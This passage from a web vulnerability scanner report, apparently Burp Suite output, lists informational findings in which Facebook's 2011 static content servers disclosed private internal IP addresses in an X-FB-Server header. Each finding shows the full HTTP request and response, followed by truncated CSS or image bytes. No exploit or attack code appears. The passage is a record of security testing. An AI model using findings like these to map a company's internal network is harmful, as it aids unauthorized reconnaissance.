Cache-Control: public, max-age=23675309
Expires: Wed, 18 Apr 2012 15:27:12 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1303226812,169776068*/

.page_browser_page_name_box{height:28px;text-align:center;width:90px}
.page_browser_pic_container{background-color:#8ca7e0;height:150px;position:relative;width:100px}
.page_b
...[SNIP]...

24.127. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/Trz9qEKGISz.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yy/r/Trz9qEKGISz.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.185

Request

GET /rsrc.php/v1/yy/r/Trz9qEKGISz.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:04 GMT
X-FB-Server: 10.138.17.185
Vary: Accept-Encoding
Content-Length: 336
Cache-Control: public, max-age=30231475
Expires: Tue, 03 Jul 2012 12:36:38 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309783009,176820665*/

.sp_2uu5k2{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/ZsaRRxDPUYu.png);background-repeat:no-repeat;display:inline-block;height:15px;width:29px}
.sx_7e1c
...[SNIP]...

24.128. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/5fFMnagjg2S.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yz/r/5fFMnagjg2S.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.183

Request

GET /rsrc.php/v1/yz/r/5fFMnagjg2S.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:35:13 GMT
X-FB-Server: 10.138.64.183
Content-Length: 1355
Vary: Accept-Encoding
Cache-Control: public, max-age=30932546
Expires: Wed, 11 Jul 2012 15:19:49 GMT
Date: Tue, 19 Jul 2011 14:57:23 GMT
Connection: close

/*1310484050,176832695*/

.dialog_page_wrapper{margin-top:20px;margin-left:auto;margin-right:auto}
.dialog_page_wrapper .pop_content{border:1px solid #cfcfcf;-webkit-border-radius:5px}
.dialog_page_wr
...[SNIP]...

24.129. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/AKFdbdR6W5B.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yz/r/AKFdbdR6W5B.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.199

Request

GET /rsrc.php/v1/yz/r/AKFdbdR6W5B.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:34 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 4206
Vary: Accept-Encoding
Cache-Control: public, max-age=25596787
Expires: Thu, 10 May 2012 21:10:53 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

/*1305148200,169775559*/

.UITwoColumnLayout_Container{margin:0}
.UITwoColumnLayout_Content{float:left}
.UITwoColumnLayout_NarrowContent{float:right}
.UITwoColumnLayout_LeftOrientation .UITwoColumnLay
...[SNIP]...

24.130. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/deIrY85PE2v.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z-/r/deIrY85PE2v.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /rsrc.php/v1/z-/r/deIrY85PE2v.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/pages/create.php?ref_type=sitefooter
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 70245
Content-Type: image/png
Last-Modified: Wed, 29 Jun 2011 21:13:43 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Cache-Control: public, max-age=30234441
Expires: Tue, 03 Jul 2012 13:25:11 GMT
Date: Tue, 19 Jul 2011 14:57:50 GMT
Connection: close

.PNG
.
...IHDR...o.........0......,IDATx..} tdW.._..{...*....V.Ww...i.c|....C.6.`.30...!d&3..3p29$..$.&....L.C. ...&.1...m.m.W.z..RIU.......=.JR.RIn..}.J.R.{....\Or:C...R.\<zh..j...../cRW,.j
YW...h
...[SNIP]...

24.131. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/ukvLMiNkr_t.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z-/r/ukvLMiNkr_t.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/z-/r/ukvLMiNkr_t.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 343
Content-Type: image/png
Last-Modified: Sun, 10 Jul 2011 12:18:46 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Cache-Control: public, max-age=30813218
Expires: Tue, 10 Jul 2012 06:11:31 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

.PNG
.
...IHDR...!...6...........0PLTE..................Kf.m.....Jf................Kg.8.).....tRNS....T.0!+....IDATx^..1..@..7..-,..1....#X.,.n.I....!..hHX+.. ...x...Y..x... ..2..]1.... ...n"....%
...[SNIP]...

24.132. http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/v3dJrMQoPk1.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z-/r/v3dJrMQoPk1.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.183

Request

GET /rsrc.php/v1/z-/r/v3dJrMQoPk1.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/help/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1592
Content-Type: image/png
Last-Modified: Mon, 11 Jul 2011 01:48:17 GMT
X-FB-Server: 10.138.64.183
Cache-Control: public, max-age=30931892
Expires: Wed, 11 Jul 2012 15:09:31 GMT
Date: Tue, 19 Jul 2011 14:57:59 GMT
Connection: close

.PNG
.
...IHDR.............K......PLTE.......................akkkRuq.............z[...4i.pz.bn{....tI..R...........mlll.}S............[[[........a........`^^^.~a......888......My...2.ybCQa...;m..{k
...[SNIP]...

24.133. http://static.ak.fbcdn.net/rsrc.php/v1/z1/r/qcTMR8qeslF.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z1/r/qcTMR8qeslF.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.183

Request

GET /rsrc.php/v1/z1/r/qcTMR8qeslF.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:15 GMT
X-FB-Server: 10.138.69.183
Content-Length: 56848
Vary: Accept-Encoding
Cache-Control: public, max-age=30424624
Expires: Thu, 05 Jul 2012 18:15:02 GMT
Date: Tue, 19 Jul 2011 14:57:58 GMT
Connection: close

.PNG
.
...IHDR..............W......tRNS...... .......IDATx^..... .C......|*@1.aW<......9V..$.UUU....7l...........20...;~$1.....o..~..........>n.N....!.. ..P....d.f!.....8I;EDD.n.>....?....@... ...

...[SNIP]...

24.134. http://static.ak.fbcdn.net/rsrc.php/v1/z4/r/EAbydW1M_XR.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z4/r/EAbydW1M_XR.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.182

Request

GET /rsrc.php/v1/z4/r/EAbydW1M_XR.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 19:53:27 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.64.182
Content-Length: 24273
Vary: Accept-Encoding
Cache-Control: public, max-age=20606062
Expires: Wed, 14 Mar 2012 02:51:57 GMT
Date: Tue, 19 Jul 2011 14:57:35 GMT
Connection: close

.PNG
.
...IHDR.............T.a...^.IDATx....WSg...\......r......iWWm.tYY.v.....T.!#.".."...T.9@...!b...@...I...T..P(.3.......H..Ux.YO.I....../.....r.\.........r....!...~.....D....#j...F.n...8os.!..
...[SNIP]...

24.135. http://static.ak.fbcdn.net/rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 892
Content-Type: image/gif
Last-Modified: Wed, 02 Mar 2011 04:58:52 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Cache-Control: public, max-age=28443194
Expires: Tue, 12 Jun 2012 19:51:00 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

GIF89a......bz....Oj.Zs..........z.....v..;Y...........................................................................................................................................................
...[SNIP]...

24.136. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/UvyvLtJTQzO.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z7/r/UvyvLtJTQzO.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.184

Request

GET /rsrc.php/v1/z7/r/UvyvLtJTQzO.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 111
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:46:48 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.184
Cache-Control: public, max-age=20580630
Expires: Tue, 13 Mar 2012 19:48:16 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

.PNG
.
...IHDR... ...........T(....PLTEs.Q....N......tRNS.@..f....IDAT..c.``.a`.c`.g`.......a.V......IEND.B`.

24.137. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/Z6rULnd-GE-.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z9/r/Z6rULnd-GE-.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.182

Request

GET /rsrc.php/v1/z9/r/Z6rULnd-GE-.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 571
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 14:22:33 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.182
Cache-Control: public, max-age=20586297
Expires: Tue, 13 Mar 2012 21:22:31 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

.PNG
.
...IHDR...&..........T......PLTE.........n..p.._x.s.....\u.............g~._w....z..i..p..x..n..\v....t.................w.....w.............................f~....r.....f}....t..c{..........d|.
...[SNIP]...

24.138. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.184

Request

GET /rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 54735
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 12:39:11 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.64.184
Cache-Control: public, max-age=20666489
Expires: Wed, 14 Mar 2012 19:39:21 GMT
Date: Tue, 19 Jul 2011 14:57:52 GMT
Connection: close

.PNG
.
...IHDR.......n.....y.._....PLTE...p...........i.................................................................u...........z.................................................................
...[SNIP]...

24.139. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:54:09 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.185
Content-Length: 1900
Vary: Accept-Encoding
Cache-Control: public, max-age=20567486
Expires: Tue, 13 Mar 2012 19:55:11 GMT
Date: Tue, 19 Jul 2011 18:43:45 GMT
Connection: close

GIF89a . ....Ro.y.................e~.........................................................................!..NETSCAPE2.0.....!.......,.... . .... &.di.h..l..p,..AX.E....../.#\.H...<*G...y..,..u....
...[SNIP]...

24.140. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/TwAHgQi2ZPB.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zB/r/TwAHgQi2ZPB.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.183

Request

GET /rsrc.php/v1/zB/r/TwAHgQi2ZPB.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1203
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:49:58 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.183
Cache-Control: public, max-age=20580745
Expires: Tue, 13 Mar 2012 19:50:00 GMT
Date: Tue, 19 Jul 2011 14:57:35 GMT
Connection: close

.PNG
.
...IHDR.......O.....a1......PLTE...............................................................................................................................................................
...[SNIP]...

24.141. http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/Unmn04Ngmxd.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zB/r/Unmn04Ngmxd.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.197

Request

GET /rsrc.php/v1/zB/r/Unmn04Ngmxd.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 232
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 17:08:09 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.145.197
X-Cnection: close
Cache-Control: public, max-age=20596278
Expires: Wed, 14 Mar 2012 00:08:51 GMT
Date: Tue, 19 Jul 2011 14:57:33 GMT
Connection: close

GIF89a..........HPa.l3............S^l...NXg.......G.fm{.........sy...........................................!.......,..........e E=N.4.#...AS.E.+>...K.......,.G..akLx
.!6i....u.hn..!.;Y.p.I.Fq.....=*
...[SNIP]...

24.142. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/hIGTc2UFq5P.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zD/r/hIGTc2UFq5P.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/zD/r/hIGTc2UFq5P.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 43183
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:15 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Cache-Control: public, max-age=30428336
Expires: Thu, 05 Jul 2012 19:16:31 GMT
Date: Tue, 19 Jul 2011 14:57:35 GMT
Connection: close

.PNG
.
...IHDR.......d......<......tRNS...... ......dIDATx^..A.. ...^.K.....$....;..F...8..........4.....[`...AP.....*..U...b..Sc..Z....M5.....%.M.......1.Z....J..".......Py...}.o..b.. ........w....
...[SNIP]...

24.143. http://static.ak.fbcdn.net/rsrc.php/v1/zE/r/eh0bmn9m_mm.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zE/r/eh0bmn9m_mm.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.193

Request

GET /rsrc.php/v1/zE/r/eh0bmn9m_mm.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 11938
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 01:52:15 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Cache-Control: public, max-age=30424594
Expires: Thu, 05 Jul 2012 18:14:30 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

.PNG
.
...IHDR.......l.....)/.X....tRNS...... ......WIDATx^.Y[..G......t..x..&..8H.o.% ....x!.......o.'...I..v......V..S...x......33.g.[55....w.-....3M.'.kB....o...#.VZ+.$.p.D.......n....7^...H..mOl
...[SNIP]...

24.144. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zF/r/p13yZ069LVL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /rsrc.php/v1/zF/r/p13yZ069LVL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 792
Content-Type: image/png
Last-Modified: Tue, 07 Jun 2011 17:59:39 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Cache-Control: public, max-age=28381977
Expires: Tue, 12 Jun 2012 02:50:12 GMT
Date: Tue, 19 Jul 2011 14:57:15 GMT
Connection: close

.PNG
.
...IHDR.......0.............sRGB.........bKGD............. pHYs.................tIME.....03a2....."tEXtComment.Created with GIMP on a Mac..wC...jIDATx^..QM.Q.D...v4.......k....lW..s...>.>...
...[SNIP]...

24.145. http://static.ak.fbcdn.net/rsrc.php/v1/zI/r/llncLdVc0JC.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zI/r/llncLdVc0JC.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.197

Request

GET /rsrc.php/v1/zI/r/llncLdVc0JC.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 60
Content-Type: image/gif
Last-Modified: Mon, 15 Mar 2010 12:39:11 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.197
X-Cnection: close
Cache-Control: public, max-age=20666492
Expires: Wed, 14 Mar 2012 19:39:25 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

GIF89a.. .......<\.......!.......,...... .....a..m....%.(.;

24.146. http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/RVElCNYrs5z.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zJ/r/RVElCNYrs5z.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /rsrc.php/v1/zJ/r/RVElCNYrs5z.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 17:08:11 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.196
X-Cnection: close
Cache-Control: public, max-age=20596224
Expires: Wed, 14 Mar 2012 00:07:58 GMT
Date: Tue, 19 Jul 2011 14:57:34 GMT
Connection: close

GIF89a.........jp~...}...........AEM[am.....................!.......,.........>0...Mb.......[..Iap...b.....&..2]........FO..D&$..E.....lB#..".;

24.147. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/7ngmhwdsni2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zM/r/7ngmhwdsni2.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /rsrc.php/v1/zM/r/7ngmhwdsni2.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2950
Content-Type: image/png
Last-Modified: Sun, 10 Jul 2011 12:18:47 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Cache-Control: public, max-age=30803365
Expires: Tue, 10 Jul 2012 03:26:55 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

.PNG
.
...IHDR...%..........P.....MIDATx...]l....W..(.C..*.*?...S.R).
...JE.....-Q...4..(.J....M.C.K.....B...6fAa.q....T. W.......Fa..?.............]c.J.w....q..;wgv ...6....X....*....T*..gFj.Ka %.x
...[SNIP]...

24.148. http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/FzmFaNDPhjU.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zP/r/FzmFaNDPhjU.png

Issue detail

